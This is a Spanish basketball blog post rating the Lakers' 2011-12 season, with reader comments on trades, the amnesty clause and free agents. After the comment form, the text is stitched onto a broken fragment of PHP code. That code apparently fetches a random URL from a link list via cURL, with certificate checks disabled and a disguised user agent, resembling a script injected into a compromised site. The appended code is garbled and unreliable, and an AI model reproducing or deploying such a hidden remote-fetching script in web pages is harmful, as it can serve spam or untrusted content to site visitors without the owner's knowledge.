Los Angeles Lakers: aprobado

24 de July de 2012 por MagicJohnson32

¿Qué criterio debemos emplear para evaluar la temporada de los Lakers? La calificación variará radicalmente si damos prioridad a las no muy elevadas expectivas a inicio de la temporada o si, en cambio, nos basamos en la incuestionable calidad de sus tres estrellas. ¿Qué ha de pesar más, la masa salarial y el currículum de la plantilla o bien las circunstancias que condicionaron la temporada 2011-2012? Echemos la mirada atrás, hasta mayo de 2011, y repasemos la sucesión de acontecimientos y decisiones que ayudan a explicar el paso atrás que supuso para la franquicia angelina la recientemente concluida campaña.

Vayamos, pues, hasta el 8 de mayo de 2011. Aquel día, los Mavs cerraron con un 4-0 su eliminatoria de segunda ronda contra los Lakers, que eran barridos por primera vez desde el 99. La pésima imagen ofrecida por el equipo, ensuciada todavía más con la expulsión de Bynum tras golpear a Barea, dio paso a un verano extraño, enrarecido por la pronta eliminación y por el anuncio del adiós de Phil Jackson. La franquicia, posiblemente escarmentada por la mala experiencia de Tomjanovic (quien sustituyó a Jackson en 2004 y renunció a mitad de temporada), se decantó por un técnico con la piel gruesa, capaz de convivir con las más que probables críticas que iban a llover en cuanto las cosas se torciesen (que, como bien sabemos, se torcieron). Importó más este aspecto del perfil que lo meramente táctico y baloncestístico, cosa que acabó revelándose como un sonado error. El elegido fue Mike Brown, cuya única experiencia como head coach hasta la fecha eran sus cinco campañas al frente de los Cavs de LeBron, etapa durante la cual alcanzó las Finales de 2007 y fue elegido Coach of the Year en 2009. De su pericia con la pizarra, sin embargo, no hay mucho que decir.

Pau Gasol Mike Brown

Y, por si fuera poco, llegó el lockout; y, acabado el lockout, llegó el veto. No nos extenderemos en explicar lo ya sabido pero sí conviene entender cómo aquel acuerdo frustrado, que debía llevar a Chris Paul a los Lakers a cambio de Lamar Odom y Pau Gasol, supuso un golpe del que el equipo jamás se recuperó. Especialmente tocado quedó Odom, quien demandó el traspaso y se fue a Dallas a cambio de una primera ronda y una Trade Exception equivalente al salario del jugador. Su ausencia se hizo notar: sin el mejor sexto hombre de la temporada anterior -y sin Shannon Brown, emigrado a Phoenix como agente libre-, el banquillo de los Lakers fue el menos productivo de la liga. Jamás encontró Mike Brown soluciones entres sus suplentes, salvo por la anotación de Goudelock en el tramo inicial, algunos buenos minutos de Jordan Hill en la serie ante Denver y los primeros partidos de Ramon Sessions, antes de que el base procedente de los Cavs se hiciera con la titularidad.

Mucha más entereza que Odom mostró Gasol. Por supuesto, los continuados rumores y el traspaso vetado le pasaron factura, pero tan solo es necesario comparar su comportamiento al de Odom para entender el extraordinario ejercicio de dignidad profesional que llevó a cabo el jugador catalán. De hecho, su rendimiento se vio más condicionado por el nuevo (des)orden táctico que trajo consigo Mike Brown. Desterrado el triángulo ofensivo, y sin un Chris Paul capaz de aportar sentido al ataque, Gasol no terminó de encontrar su sitio y en muchos momentos se vio superado por Andrew Bynum en la escala jerárquica. Especialmente grises fueron sus Playoffs, pero ya llegaremos a ello a su debido momento.

Así, debilitados y repletos de dudas, los Lakers iniciaron la temporada sin Bynum (sancionado cuatro partidos por su batacazo a Barea) y con el susto en el cuerpo a causa de una lesión de Bryant en la muñeca, justo cuando había dejado atrás las molestias en la rodilla que le lastraron toda la temporada anterior. Con la idea de minimizar la ausencia de Odom y reforzar el banquillo, Brown probó a sacar a Metta World Peace como suplente. De esta manera, Fisher, Bryant, Ebanks, McRoberts y Gasol compusieron el quinteto inicial en el partido inaugural y los tres siguientes. En el quinto, y tras un balance de 2-2, Bynum asumió su puesto en lugar de McRoberts y Barnes sustituyó a Ebanks, quien pasó de titular a ni aparecer por el parquet. Durante unos partidos, y pese a que Barnes no mejoró sustancialmente la aportación de Ebanks, los resultados acompañaron. Duró poco: tras una serie de malos resultados, con un balance de 11-9, Mike Brown puso fin a las probaturas, devolvió a Barnes a su rol de suplente y recuperó a World Peace para el quinteto.

En realidad, lo mismo daba.

Gasol Kobe Bynum

Sin recursos tácticos que maximizasen las cualidades de la plantilla y sin la más mínima aportación por parte de los secundarios, cualquier posibilidad de éxito descansaba sobre los hombros de Bryant, Gasol y Bynum. Kobe estuvo brillante y demoledor con mucha frecuencia, excesivo y tozudo en sus peores noches y, por encima de todo, dejó probado que el tratamiento experimental en la rodilla había sido un éxito y que le queda carrete para rato. Por su parte, Bynum dio un gran paso adelante: se mantuvo sano durante toda la campaña, alcanzó por primera vez la condición de All-Star y, con solo 24 años, se consolidó como el segundo mejor center de la competición. Las sombras a su actuación fueron sus chiquilladas, los desplantes al técnico que de manera más clara ha apostado por él, sus malos gestos y declaraciones fuera de tono. De Gasol ya hemos hablado: no logró descifrar lo que Mike Brown quería de él, si es que había algo que descifrar, y a lo largo de la temporada se le notó frustrado, cansado e incluso resignado. Brown lo alejó del aro y Gasol perdió agresividad, pero su enorme talento le resultó suficiente para firmar una fase regular de lo más sólida.

El tránsito de los Lakers por la temporada estaba dentro de lo esperado (27-16) cuando llegó el trade deadline, el día 15 del tercer mes: los idus de marzo. Incorporaron entonces, tras semanas de rumores, a Ramon Sessions; y en un acuerdo con los Rockets, destinado a ahorrar un dinero a la franquicia y a romper el corazón de muchos seguidores, salió Derek Fisher a cambio de Jordan Hill. Sessions tuvo, de inmediato, un impacto positivo en el juego de los Lakers, tan necesitados del punto de efervescencia que un base de sus características puede aportar. Desde sus primeros encuentros, en los que partió como suplente, Sessions derrochó confianza y el equipo pudo meter una marcha más a uno de los ataques más lentos de la liga. De hecho, Sessions fue, junto a la mejora de Metta World Peace, clave en los buenos resultados durante la ausencia de Bryant por lesión, lo cual ayudó a los Lakers a imponerse a Grizzlies y Clippers en la disputa por la tercera plaza del Oeste. Lamentablemente, a World Peace le salió el Artest que lleva dentro cuando mejor estaba jugando. Su brutal codazo a Harden en el penúltimo partido de la fase regular marcó uno de los momentos negros de la campaña y, de un plumazo, echó por tierra su mejoría y todo el esfuerzo que el jugador venía haciendo para recuperar su imagen pública.

La tercera plaza supuso un cruce ante los Nuggets, eliminatoria que se decidió en el séptimo encuentro y de la que si algo hay que rescatar es la crisis que se desató con la bochornosa derrota en el sexto partido. La actuación de Gasol aquel día (3 puntos, 1 de 10 en tiros, 3 rebotes) le puso en el punto de mira de muchas críticas, y no solo a él, ya que la posibilidad de una eliminación en primera ronda era algo que hacía temblar los cimientos del proyecto. Magic Johnson, en condición de comentarista de televisión (y no como representante de la franquicia, detalle importante) aseguró que, de caer en el séptimo, tanto Gasol como Mike Brown y Andrew Bynum abandonarían los Lakers este verano. La respuesta del dúo interior fue admirable y, sumado al regreso de World Peace y los triples de Blake,  permitió vencer a unos Nuggets que no claudicaron hasta la bocina final.

Los Lakers pasaron de ronda, sí, pero el agotamiento físico y anímico fue demasiada losa ante unos Thunder infinitamente más jóvenes y que habían disfrutado de una semana de descanso tras barrer a los Mavs. Los de Scott Brooks arrollaron en el primer partido de la serie y en el segundo, como ya hicieran ante Dallas, remontaron lo irremontable para poner la eliminatoria 2-0. Los Lakers trataron de ralentizar el ritmo, reducir la capacidad de los Thunder para obtener puntos fáciles al contraataque, y hasta cierto punto lo consiguieron. Y aun así, pese a llevar los partidos a un terreno más propicio para los Lakers, Westbrook avasalló a Sessions y, junto a Harden, controlaron el tempo del juego. Bryant anotó (de hecho, más de un tercio de los puntos de su equipo fueron suyos) pero el jugador más determinante fue Durant, ejecutor infalible cada vez que tuvo la ocasión de ser decisivo. Además, la influencia de Gasol y Bynum palideció ante el trabajo incansable de Ibaka, Perkins y Collison, de modo que los angelinos no lograron imponerse en frente alguno. Fue una serie equilibrada, al menos más equilibrada de lo que parece indicar el 4-1, pero los Thunder fueron, sencillamente, mejor equipo.

kobe bryantLo mejor: Andrew Bynum, al fin sano, se reveló como un pívot decisivo, el segundo mejor de la liga y tal vez el mejor de la temporada 2011-2012. Elevó sus promedios a casi 19 puntos, 12 rebotes y 2 tapones, y en una regular season tan exigente en el aspecto del físico como ha sido esta, solo se perdió por lesión un partido. Su actitud es otra historia.

– Kobe Bryant no será eterno, pero con 33 a punto de los 34, sigue entre los mejores del mundo. Y entre los más resistentes: un año más, volvió a jugar a un nivel descomunal pese a un esguince de muñeca y a una fractura en el tabique nasal, y solo se perdió partidos hacia el final de la regular season, por una lesión que exigía reposo. Jugó 38.5 minutos de media y se quedó a un paso del título de máximo anotador, algo impensable para cualquier otro jugador con tantas temporadas NBA a cuestas. En definitiva, dio motivos a la franquicia para seguir apostando por un proyecto ganador a corto plazo.

Lo peor: La transición del triángulo ofensivo a un sistema más ortodoxo, obviamente, no funcionó. El equipo careció de cualquier recurso estratégico más allá de los aclarados a Bryant y los balones interiores. A lo largo de la temporada no mostraron ninguna evolución, ninguna mejora, y con demasiada frecuencia su juego parecía fruto de la improvisación. El lock-out, la falta de un training camp en condiciones, el veto, la marcha de Odom, el calendario de locura diseñado por la NBA… todo ello sirve a Mike Brown de coartada ante esta pobreza táctica, al menos a ojos de la franquicia. Brown tendrá la oportunidad de dirigir el equipo en una temporada sin tantas circunstancias extraordinarias como fue la pasada. Es decir, podrá desquiciarnos de nuevo.

– Como ya se ha mencionado, uno de los que más problemas encontró para hacerse con los sistemas de Brown fue Gasol. Eso, sin embargo, no explica por qué Pau volvió a desvanecerse en Playoffs por segundo año consecutivo. Tras firmar 17.4 puntos (50% de acierto) y 10.4 rebotes en la regular season, su aportación en las eliminatorias ante Nuggets y Thunder se desplomó hasta 12.5 puntos (43%) y 9.5 rebotes. Cuesta culpar a Mike Brown de esto cuando ya le sucedió con Phil Jackson en el banquillo.

Ramon Sessions– La llegada de Ramon Sessions, tan esperanzadora como resultó en su momento, acabó en gran decepción ante su pobre papel en los Playoffs. Se desdibujó ante Lawson y Westbrook, y perdió la chispa de sus primeras actuaciones. Dio la impresión de que habría agradecido un retorno a su papel como suplente, pero tampoco supo Mike Brown gestionarlo. Para acabar, renunció a la player option para ampliar un año su contrato y, cuando quiso darse cuenta, los Lakers habían firmado a Steve Nash y ya no estaban interesados en su regreso.

– Por último, entre lo peor de la temporada hay que anotar la marcha de Fisher, que fue un golpe bajo, especialmente por la manera en que se produjo.

Jugando a GM: No ha acabado julio y ya hemos hecho buena parte de nuestros deberes. Lo cierto es que a principios de la temporada no teníamos muy claro qué debíamos hacer. El veto nos rompió los esquemas y no sabíamos si renovar un proyecto que daba síntomas de agotamiento, reducir a toda costa la masa salarial para evitar la penalización al impuesto de lujo que impone el nuevo convenio colectivo a las franquicias reincidentes, o bien hacer los movimientos justos que devolviesen al equipo a los principales candidatos al anillo. La eliminación en segunda ronda nos tentó a amnistiar a World Peace, deshacernos de media plantilla y largar a Gasol a cambio de dos o tres jugadores, nadie de su calidad pero sí más jóvenes y baratos.

Pero en esas, resulta que Steve Nash se pone a tiro. Nadie da un duro por nosotros, claro, porque estamos muy por encima del límite salarial y necesitaríamos un sign & trade con los Suns, que odian a los Lakers por encima de cualquier otra cosa. Los Raptors y los Knicks son los favoritos para hacerse con él. Lo que no sabían era que Nash prioriza dos cosas que los Lakers pueden ofrecerle: estar cerca de su familia y optar al anillo. Y los Suns, antes de quedarse de vacío, aceptan la oferta de cuatro elecciones del draft, más la Trade Exception de Odom, más 2.7 millones en cash. Y Nash es nuestro, lo cual cambia completamente las cosas: estamos entusiasmados ante la perspectiva de un equipo con Nash, Bryant y Gasol. ¿Y Bynum? Sí, queremos a Bynum, aunque preferimos a Dwight Howard. Estamos convencidos de que Howard sería el ancla defensiva perfecta, la guinda del proyecto, y que todas sus dudas sobre renovar o no desaparecerían en cuanto aterrizase en California.

howard bynum¿Y el banquillo? Para ese banquillo tristón necesitamos anotadores, gente capaz de sacar partido de los espacios que Bryant, Gasol y sobre todo Nash van a generar. Jamison es nuestro hombre. Es agente libre sin restricciones y está ante una de sus últimas oportunidades de ganar un anillo. Claro, también podría firmar su último gran contrato e ir a Charlotte, de donde él es nativo. Pero no, acepta firmar por el mínimo y convertirse en el sexto hombre que buscábamos.

Se nos escapa Grant Hill, quien opta por los Clippers, y ahora tenemos dos asignaturas pendientes. La primera, renovar a Jordan Hill, nuestro agente libre que con su energía y ganas se ganó el volver en octubre. Dice que está ansioso por jugar al lado de Nash, y firma por dos temporadas. También queremos otro interior veterano y es posible que le demos un contrato a Jermaine O’Neal, aunque en el work out no nos convenció. La segunda asignatura pendiente es añadir anotadores a la plantilla. Courtney Lee y OJ Mayo están por encima de nuestras posibilidades, limitadas a la mini mid level de 3.1 millones. Lo intentamos con Brandon Rush, que es agente libre restringido. Los Warriors no lo van a dejar ir, así que mejor si empezamos a pensar en alternativas. Jodie Meeks podría valer. Otros agentes libres todavía sin equipo son Delfino, Barbosa, Michael Redd o Belinelli (aunque del italiano me dicen que firmará por Chicago). Antes de decantarnos por uno u otro, intentaremos agotar las negociaciones con los Magic, no sea que de la mano de Dwight Howard vengan Richardson o Turkoglu, con lo que seguramente deberíamos cerrar el grifo y la plantilla. De hecho, y con esto último en mente, hemos sido lo suficientemente prudentes para reservar la amnistía de cara al próximo verano.

En cualquier caso, y aunque está feo que lo digamos nosotros, hemos hecho un buen trabajo y nuestro equipo pinta francamente bien de cara a la 2012-2013.

Comenta

13 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    El mejor resumen de los 23 publicados hasta ahora. Impecable, como el 10 de Nadia Comaneci. Enhorabuena Magic!! Crack total!!

      Citar

  2. Vader dice:
    #2

    Muy buen análisis.

    ¿Puede ser que la amnistia sólo se pueda hacer este año?

      Citar

  3. MagicJohnson32 dice:
    #3

    Gracias, chavales.

    Vader, el nuevo convenio establecía tres plazos para que las franquicias eliminasen de sus cuentas un contrato firmado durante el anterior CBA. En diciembre pasado finalizó el primer plazo, el martes 17 (hace una semana) finalizó el segundo, y el tercero será en julio de 2013.

    Ya que estamos… Lakers podrán amnistiar a MWP, Kobe, Pau y Blake. En cualquier caso, si deciden utilizar la amnistía es solo por ahorrar dinero (de ahí lo absurdo de pensar en la amnistía para Kobe o Gasol). Están tan por encima del límite salarial que sacar un contrato de los libros no supondría ninguna diferencia a la hora de fichar FA.

      Citar

  4. Esteban dice:
    #4

    coincido en todo, de hecho no fue una temporada con mucha discucion, claramente fueron desde el inicio un equipo de segunda ronda,

    sobre el GM, jamison y hill es una dupla de internos suplentes genial, asi que sobra Mcrobets que con poco mas de 2 millones y un año de contrato podria conseguirsele equipo, un sam youn al menos…

    un jodiee mekks o carlos delfino y estan de perlas, y ni hablar si barbosa acepta el minimo de veteranos,

    como estan parados hoy son 4 jugadores y nada mas, no tienen tiradores fiables, ni explosion desde el banco, ni jugadores de rol, necesitarian dos tiradoes y listo, rush y meeks seria soñar demasiado

      Citar

  5. Esteban dice:
    #5

    MagicJohnson32:
    Gracias, chavales.

    Vader, el nuevo convenio establecía tres plazos para que las franquicias eliminasen de sus cuentas un contrato firmado durante el anterior CBA. En diciembre pasado finalizó el primer plazo, el martes 17 (hace una semana) finalizó el segundo, y el tercero será en julio de 2013.

    Ya que estamos… Lakers podrán amnistiar a MWP, Kobe, Pau y Blake. En cualquier caso, si deciden utilizar la amnistía es solo por ahorrar dinero (de ahí lo absurdo de pensar en la amnistía para Kobe o Gasol). Están tan por encima del límite salarial que sacar un contrato de los libros no supondría ninguna diferencia a la hora de fichar FA.

    magisic, sucede que si este año traspasaban a pau a houston a cambio de una trad exception, se retiraba metta y amnistian a blake, hubiesen quedado algo por debajo del tope y por ende con tadas las excepciones

      Citar

  6. MagicJohnson32 dice:
    #6

    Esteban: magisic, sucede que si este año traspasaban a pau a houston a cambio de una trad exception, se retiraba metta y amnistian a blake, hubiesen quedado algo por debajo del tope y por ende con tadas las excepciones

    Jaja, Esteban, lo dices como si fuese tan normal. ¿Por qué se iba a retirar MWP? ¿Traspasar a Pau por una TE? Y, por encima de todo ¿qué ganarían los Lakers con todo eso? Se quedarían una de sus estrellas, otro de sus titulares y su único base suplente.

    Suena Delonte West para Lakers.

      Citar

  7. Esteban dice:
    #7

    que MWP se iba a retirar se romoreo fuertemente en los PO pasados,
    pau por un trad exception creo que hubiese tenido sentido y aun lo tiene en los rockets con tanto espacio…

    y a tu ultima pregunta, que ganarian? seguir con kobe y bynum, una trade exception para fichar 2 o 3 jugadores por el valor de pau, podrian ser el propio calderon y algun raptors mas, scola y martin de houston, y mientras tanto mantienen las excepciones salariales que podrian haberle dado a beasley la de 5 millones y aun tener otra de 3 millones para ofertar a alguien mas

      Citar

  8. Sancho88 dice:
    #8

    Jejeje, Esteban por ver a Pau en los Bobcats yo creo que pagaría y todo, jaajaj. Pero coincido contigo en que sería beneficioso para el basket la retirada de ese señor loco

      Citar

  9. Sancho88 dice:
    #9

    por cierto, Esteban, te animo a ver la exhibición de Pau ayer contra Chandler o contra quien fuese JUGANDO EN LA ZONA. Creo que ya queda todo dicho con el partido de ayer y con la gira de preparación, y creo que lo demostrará en los JJ.OO. En la zona hoy en día Pau es uno de los cinco mejores jugadores del mundo sin discusión ninguna

      Citar

  10. MagicJohnson32 dice:
    #10

    Esteban:
    que MWP se iba a retirar se romoreo fuertemente en los PO pasados,

    MWP se planteaba la retirada si los Lakers le amnistiaban. Eso mismo lo hizo Billups intentando evitar que algún equipo pujase por él tras la amnistía y así poder elegir dónde jugar.

    El último G en sonar para Lakers es Roger Mason.

      Citar

  11. MagicJohnson32 dice:
    #11

    Vuelve a aparecer el nombre de Jodie Meeks con cierta fuerza en los rumores para Lakers.

      Citar

  12. Esteban dice:
    #12

    ese si que seria un buen refuerzo para lakers, aunque me parce dificil, alguien le ofrecera algo mas que el minimo de veterano, los lakers aun tienen la mini excepcion de nivel medio no? quiza utilizarla en el o en delfino y concencer a barbosa del minimo de veterano

    no podran conseguir un perimetral por mcroberts? su contrato es algo alto, pero es solo de un año y es un jugador util que puede ser un recambio para muchos equipos, los lakers ya no lo necesitan con jamison, un perimetral por el seria una buena jugada

      Citar

  13. drazgon dice:
    #13

    Buen análisis sí señor pero creo que el mejor refuerzo de los Lakers debería estar en el banquillo.
    Yo confio cero patatero en Mike Brown.
    Un saludo y espero que os paséis por Baloncestistas de vez en cuando.
    Os meto en los links.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>